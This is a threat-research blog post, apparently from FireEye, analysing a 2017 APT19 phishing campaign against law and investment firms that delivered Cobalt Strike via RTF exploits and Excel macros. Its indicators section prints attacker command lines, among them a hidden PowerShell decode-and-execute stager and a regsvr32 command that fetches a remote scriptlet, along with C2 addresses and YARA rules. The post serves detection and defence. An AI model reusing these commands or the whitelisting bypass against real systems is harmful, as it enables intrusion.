# g q Counsel **[fireeye.com /blog/threat-research/2017/06/phished-at-the-request-of-counsel.html](https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html)** ## Summary In May and June 2017, FireEye observed a phishing campaign targeting at least seven global law and investment firms. We have associated this campaign with APT19, a group that we assess is composed of freelancers, with some degree of sponsorship by the Chinese government. APT19 used three different techniques to attempt to compromise targets. In early May, the phishing lures leveraged [RTF attachments that exploited the Microsoft Windows vulnerability described in CVE 2017-0199. Toward the end of](https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html) May, APT19 switched to using macro-enabled Microsoft Excel (XLSM) documents. In the most recent versions, APT19 added an application whitelisting bypass to the XLSM documents. At least one observed phishing lure delivered a Cobalt Strike payload. As of the writing of this blog post, FireEye had not observed post-exploitation activity by the threat actors, so we cannot assess the goal of the campaign. We have previously observed APT19 steal data from law and investment firms for competitive economic purposes. This purpose of this blog post is to inform law firms and investment firms of this phishing campaign and provide technical indicators that their IT personnel can use for proactive hunting and detection. ## The Emails APT19 phishing emails from this campaign originated from sender email accounts from the "@cloudsend[.]net" domain and used a variety of subjects and attachment names. Refer to the Indicators of Compromise section for more details. ## The Attachments APT19 leveraged Rich Text Format (RTF) and macro-enabled Microsoft Excel (XLSM) files to deliver their initial exploits. The following sections describe the two methods in further detail. ## RTF Attachments Through the exploitation of the HTA handler vulnerability described in [CVE-2017-1099, the observed RTF](https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html) attachments download hxxp://tk-in-f156.2bunny[.]com/Agreement.doc. Unfortunately, this file was no longer hosted at tk-in-f156.2bunny[.]com for further analysis. Figure 1 is a screenshot of a packet capture showing one of the RTF files reaching out to hxxp://tk-in-f156.2bunny[.]com/Agreement.doc. ----- Figure 1: RTF PCAP ## XLSM Attachments The XLSM attachments contained multiple worksheets with content that reflected the attachment name. The attachments also contained an image that requested the user to “Enable Content”, which would enable macro support if it was disabled. Figure 2 provides a screenshot of one of the XLSM files (MD5:30f149479c02b741e897cdb9ecd22da7). Figure 2: Enable macros One of the malicious XLSM attachments that we observed contained a macro that: 1. Determined the system architecture to select the correct path for PowerShell 2. Launched a ZLIB compressed and Base64 encoded command with PowerShell. This is a typical technique used by Meterpreter stagers. Figure 3 depicts the macro embedded within the XLSM file (MD5: 38125a991efc6ab02f7134db0ebe21b6). ----- ----- Figure 3: XLSX Macro Figure 4 contains the decoded output of the encoded text. Figure 4: Decoded ZLIB + Base64 payload ----- autodiscovery[.]2bunny[.]com. The requests contain minimal HTTP headers since the PowerShell command is executed with mostly default parameters. Figure 5 depicts an HTTP GET request generated by the payload, with minimal HTTP headers. Figure 5: GET Request with minimal HTTP headers Converting the shellcode to ASCII and removing the non-printable characters provides a quick way to pull out network-based indicators (NBI) from the shellcode. Figure 6 shows the extracted NBIs. Figure 6: Decoded shellcode FireEye also identified an alternate macro in some of the XLSM documents, displayed in Figure 7. Figure 7: Alternate macro [This macro uses Casey Smith’s “Squiblydoo” Application Whitelisting bypass technique to run the command in](http://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html) Figure 8. ----- 1554d6fe12830ae57284b389a1132d65) contained the code shown in Figure 9. Figure 9: SCT contents Figure 10 provides the decoded script. Notice the “$DoIt” string, which is usually indicative of a Cobalt Strike payload. ----- ----- A quick conversion of the contents of the variable “$var_code” from Base64 to ASCII shows some familiar network indicators, shown in Figure 11. Figure 11: $var_code to ASCII ## Second Stage Payload Once the XLSM launches its PowerShell command, it downloads a typical Cobalt Strike BEACON payload, configured with the following parameters: Process Inject Targets: %windir%\syswow64\rundll32.exe %windir%\sysnative\rundll32.exe c2_user_agents Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts; IE0006_ver1;EN_GB) Named Pipes \\%s\pipe\msagent_%x beacon_interval 60 C2 autodiscover.2bunny[.]com/submit.php autodiscover.2bunny[.]com/IE9CompatViewList.xml sfo02s01-in-f2.cloudsend[.]net/submit.php sfo02s01-in-f2.cloudsend[.]net/IE9CompatViewList.xml C2 Port TCP/80 ----- Figure 12: Cobalt Strike BEACON C2 ## FireEye Product Detections The following FireEye products currently detect and block the methods described above. Table 1 lists the current detection and blocking capabilities by product. **Detection Name** **Product** **Action** **Notes** SUSPICIOUS POWERSHELL USAGE (METHODOLOGY) HX Detect XSLM Macro launch Gen:Variant.Application.HackTool.CobaltStrike.1 HX Detect XSLM Macro launch Malware Object HX Detect BEACON written to disk Backdoor.BEACON NX Block* BEACON Callback FE_Malformed_RTF EX/ETP/NX Block* RTF Malware.Binary.rtf EX/ETP/NX Block* RTF Malware.Binary EX/ETP/NX Block* RTF Malware.Binary.xlsx EX/ETP/NX Block* XSLM Table 1: Detection review _*Appliances must be configured for block mode._ ## Recommendations FireEye recommends organizations perform the following steps to mitigate the risk of this campaign: [1. Microsoft Office users should apply the patch from Microsoft as soon as possible, if they have not already](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199) installed it. 2. Search historic and future emails that match the included indicators of compromise. 3. Review web proxy logs for connections to the included network based indicators of compromise. 4. Block connections to the included fully qualified domain names. 5. Review endpoints for the included host based indicators of compromise. ## Indicators of Compromise The follo ing section pro ides the IOCs for the ariants of the phishing emails and malicio s pa loads that FireE e ----- ## Email Senders PressReader Angela Suh Ashley Safronoff Lindsey Hersh Sarah Roberto sarah.roberto@cloudsend[.]net noreply@cloudsend[.]net ## Email Subject Lines Macron Denies Authenticity Of Leak, French Prosecutors Open Probe Macron Document Leaker Releases New Images, Promises More Information Are Emmanuel Macron's Tax Evasion Documents Real? Time Allocation Vacancy Report china paper table and graph results with zeros – some ready not all finished Macron Leaks contain secret plans for the islamisation of France and Europe ## Attachment Names Macron_Authenticity.doc.rtf Macron_Information.doc.rtf US and EU Trade with China and China CA.xlsm Tables 4 5 7 Appendix with zeros.xlsm Project Codes - 05.30.17.xlsm Weekly Vacancy Status Report 5-30-15.xlsm Macron_Tax_Evasion.doc.rtf Macron_secret_plans.doc.rtf ## Network Based Indicators (NBI) lyncdiscover.2bunny[.]com autodiscover.2bunny[.]com lyncdiscover.2bunny[.]com:443/Autodiscover/AutodiscoverService/ ----- sfo02s01-in-f2.cloudsend[.]net/submit.php sfo02s01-in-f2.cloudsend[.]net/IE9CompatViewList.xml tk-in-f156.2bunny[.]com tk-in-f156.2bunny[.]com/Agreement.doc 104.236.77[.]169 138.68.45[.]9 162.243.143[.]145 Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts; IE0006_ver1;EN_GB) tf-in-f167.2bunny[.]com:443 (*Only seen in VT not ITW) ## Host Based Indicators (HBI) RTF MD5 hash values 0bef39d0e10b1edfe77617f494d733a8 0e6da59f10e1c4685bb5b35a30fc8fb6 cebd0e9e05749665d893e78c452607e2 XLSX MD5 hash values 38125a991efc6ab02f7134db0ebe21b6 3a1dca21bfe72368f2dd46eb4d9b48c4 30f149479c02b741e897cdb9ecd22da7 BEACON and Meterpreter payload MD5 hash values bae0b39197a1ac9e24bdf9a9483b18ea 1151619d06a461456b310096db6bc548 Process arguments, named pipes, and file paths powershell.exe -NoP -NonI -W Hidden -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String("") regsvr32.exe /s /n /u /i:hxxps://lyncdiscover.2bunny.com/Autodiscover scrobj.dll \\\pipe\msagent_<4 digits> C:\Documents and Settings\\Local Settings\Temp\K5om.dll (4 character DLL based on URI of original GET request) ## Yara Rules ----- meta:version=".1" filetype="MACRO" author="Ian.Ahl@fireeye.com @TekDefense" date="2017-06-02" description="This rule is designed to identify macros with the specific encoding used in the sample 30f149479c02b741e897cdb9ecd22da7." strings: // OBSFUCATION $ob1 = "ChrW(114) & ChrW(101) & ChrW(103) & ChrW(115) & ChrW(118) & ChrW(114) & ChrW(51) & ChrW(50) & ChrW(46) & ChrW(101)" ascii wide $ob2 = "ChrW(120) & ChrW(101) & ChrW(32) & ChrW(47) & ChrW(115) & ChrW(32) & ChrW(47) & ChrW(110) & ChrW(32) & ChrW(47)" ascii wide $ob3 = "ChrW(117) & ChrW(32) & ChrW(47) & ChrW(105) & ChrW(58) & ChrW(104) & ChrW(116) & ChrW(116) & ChrW(112) & ChrW(115)" ascii wide $ob4 = "ChrW(58) & ChrW(47) & ChrW(47) & ChrW(108) & ChrW(121) & ChrW(110) & ChrW(99) & ChrW(100) & ChrW(105) & ChrW(115)" ascii wide $ob5 = "ChrW(99) & ChrW(111) & ChrW(118) & ChrW(101) & ChrW(114) & ChrW(46) & ChrW(50) & ChrW(98) & ChrW(117) & ChrW(110)" ascii wide $ob6 = "ChrW(110) & ChrW(121) & ChrW(46) & ChrW(99) & ChrW(111) & ChrW(109) & ChrW(47) & ChrW(65) & ChrW(117) & ChrW(116)" ascii wide $ob7 = "ChrW(111) & ChrW(100) & ChrW(105) & ChrW(115) & ChrW(99) & ChrW(111) & ChrW(118) & ChrW(101) & ChrW(114) & ChrW(32)" ascii wide $ob8 = "ChrW(115) & ChrW(99) & ChrW(114) & ChrW(111) & ChrW(98) & ChrW(106) & ChrW(46) & ChrW(100) & ChrW(108) & ChrW(108)" ascii wide $obreg1 = /(\w{5}\s&\s){7}\w{5}/ $obreg2 = /(Chrw\(\d{1,3}\)\s&\s){7}/ // wscript $wsobj1 = "Set Obj = CreateObject(\"WScript.Shell\")" ascii wide $wsobj2 = "Obj.Run " ascii wide condition: ( ( (uint16(0) != 0x5A4D) ) and ( all of ($wsobj*) and 3 of ($ob*) or all of ($wsobj*) and all of ($obreg*) ) ) } ----- meta:version=".1" filetype="MACRO" author="Ian.Ahl@fireeye.com @TekDefense" date="2017-06-02" description="This rule was written to hit on specific variables and powershell command fragments as seen in the macro found in the XLSX file3a1dca21bfe72368f2dd46eb4d9b48c4." strings: // Setting the environment $env1 = "Arch = Environ(\"PROCESSOR_ARCHITECTURE\")" ascii wide $env2 = "windir = Environ(\"windir\")" ascii wide $env3 = "windir + \"\\syswow64\\windowspowershell\\v1.0\\powershell.exe\"" ascii wide // powershell command fragments $ps1 = "-NoP" ascii wide $ps2 = "-NonI" ascii wide $ps3 = "-W Hidden" ascii wide $ps4 = "-Command" ascii wide $ps5 = "New-Object IO.StreamReader" ascii wide $ps6 = "IO.Compression.DeflateStream" ascii wide $ps7 = "IO.MemoryStream" ascii wide $ps8 = ",$([Convert]::FromBase64String" ascii wide $ps9 = "ReadToEnd();" ascii wide $psregex1 = /\W\w+\s+\s\".+\"/ condition: ( ( (uint16(0) != 0x5A4D) ) and ( all of ($env*) and 6 of ($ps*) or all of ($env*) and 4 of ($ps*) and all of ($psregex*) ) ) } ----- meta: version=".1" filetype="MACRO" author="joshua.kim@FireEye.com" date="2017-06-02" description="Rtf Phishing Campaign leveraging the CVE 2017-0199 exploit, to point to the domain 2bunnyDOTcom" strings: $header = "{\\rt" $lnkinfo = "4c0069006e006b0049006e0066006f" $encoded1 = "4f4c45324c696e6b" $encoded2 = "52006f006f007400200045006e007400720079" $encoded3 = "4f0062006a0049006e0066006f" $encoded4 = "4f006c0065" $http1 = "68{" $http2 = "74{" $http3 = "07{" // 2bunny.com $domain1 = "32{\\" $domain2 = "62{\\" $domain3 = "75{\\" $domain4 = "6e{\\" $domain5 = "79{\\" $domain6 = "2e{\\" $domain7 = "63{\\" $domain8 = "6f{\\" $domain9 = "6d{\\" $datastore = "\\*\\datastore" condition: $header at 0 and all of them } ## Acknowledgements Joshua Kim, Nick Carr, Gerry Stellatos, Charles Carmakal, TJ Dahms, Nick Richard, Barry Vengerik, Justin Prosco, Christopher Glyer -----